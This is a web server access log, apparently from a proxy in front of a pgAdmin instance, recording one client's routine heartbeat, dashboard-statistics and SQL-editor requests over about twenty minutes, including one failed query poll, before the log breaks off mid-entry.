https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:35:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:36:46 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:36:46 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:36:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:36:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:36:48 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:36:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:36:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:36:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:37:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:38:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:38:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:39:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:39:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:40:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:40:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:41:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:41:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:42:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:42:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:43:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:43:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:44:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:44:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:45:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:45:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:46:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:46:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:47:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:47:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:48:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:48:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:49:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:49:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:50:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:50:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:51:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:51:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:51:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:52:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:52:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:53:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:53:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:54:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:54:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:55:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:55:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:13 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:13 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:15 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:17 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:17 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:18 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 137] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:18 +0000] - 500 500 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 463] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:18 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:19 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:19 +0000] - 200 